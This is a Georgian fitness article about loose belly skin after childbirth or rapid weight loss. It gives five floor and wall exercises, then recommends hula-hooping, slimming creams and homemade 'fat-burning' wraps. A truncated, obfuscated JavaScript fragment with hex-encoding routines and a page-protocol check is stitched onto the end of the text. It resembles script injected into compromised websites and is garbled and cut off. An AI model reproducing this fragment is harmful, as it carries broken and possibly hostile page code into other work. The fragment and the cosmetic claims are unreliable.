მუცელზე ჩამოკიდული კანი უამრავ ქალს უქმნის უსიამოვნო შეგრძნებას. როგორც წესი, ასეთი კანით მშობიარობის შემდეგ ან სწრაფი გახდომის შედეგად "საჩუქრდებით". ამ პრობლემას ვარჯიშითა მოიშორებთ.
1. დაწექით მარცხენა გვერდზე. მარცხენა ხელი თავქვეშ ამოიდეთ. ფეხები გაასწორეთ, მუცელი დაჭიმეთ. ამოსუნთქვისას მუცელი შეიწიეთ და ამავდროულად მარჯვენა ფეხი ასწიეთ (არც ისე მაღლა).
გაჩერდით ამ პოზაში, ჩაისუნთქეთ და ამოსუნთქვისას მარჯვენა ფეხი მარცხენას გაუსწორეთ. შეინარჩუნეთ წონასწორობა 5 წამის განმავლობაში. გაიმეორეთ ვარჯიში 6-10-ჯერ თითოეულ გვერდზე.
2. დადექით ოთხზე, დაჭიმეთ მუცლის კუნთები. ამოსუნთქვისას ერთდროულად გაჭიმეთ მარჯვენა ხელი და მარცხენა ფეხი. სწორი ხაზი უნდა მიიღოთ. გაჩერდით ამ პოზაში 3 წუთი. ამოსუნთქვისას ჩამოსწიეთ ხელი და ფეხი. გააკეთეთ 10-ჯერ თითოეულ ფეხზე.
3. სუნთქვითი ვარჯიში. დაწექით იატაკზე, ფეხები მუხლებში მოხარეთ, ხელები თავქვეშ ამოიდეთ. ჩასუნთქვისას მაქსიმალურად შეიწიეთ მუცელი და დაჭიმეთ კუნთები, ამოსუნთქვისას გამოსწიეთ. გააკეთეთ 20 ჩასუნთქვა-ამოსუნთქვა.
4. დაწექით მარცხენა მხარეს, მარცხენა ხელი თავქვეშ ამოიდეთ. მუხლში მოხარეთ მარჯვენა ფეხი და გაჭიმული მარცხენა ფეხის წინ დადგით. ასწიეთ მარცხენა ფეხი იატაკიდან 30 სმ-ის სიმაღლეზე.
ამ ილეთის შესრულებისას მაქსიმალურად უნდა გქონდეთ დაჭიმული კუნთები უკან გადავარდნა არ შეიძლება. ვარჯიში გაიმეორეთ 6-10-ჯერ, თითოეულ მხარზე.
5. ბუქნი კედელთან. სასარგებლოა დუნდულებისა და გვერდებისთვის. დაჭიმეთ მუცლის კუნთები. ამოსუნთქვისას ჩაჯექით და მუხლები 90 გრადუსზე მოხარეთ. ამოსუნთქვისას გასწორდით. გააკეთეთ 20-ჯერ.
ვარჯიშების დასრულების შემდეგ ჰულაჰუპი დაატრიალეთ 5 წუთის განმავლობაში ორივე მხარეს. ეს პროცედურა შეგიძლიათ საყვარელი ტელეგადაცემის დროს გააკეთოთ.
შედეგის მისაღებად კანში შეიზილეთ სპეციალური გელები და კრემები. აგრეთვე ეფექტიანია შინაურული ცხიმისმწველი სახვევის გაგეთება. იყავით მუდამ ფორმაში და ნუ დაგავიწყდებათ, სტატიის მეგობრებისთვის გაზიარება.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o ar w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e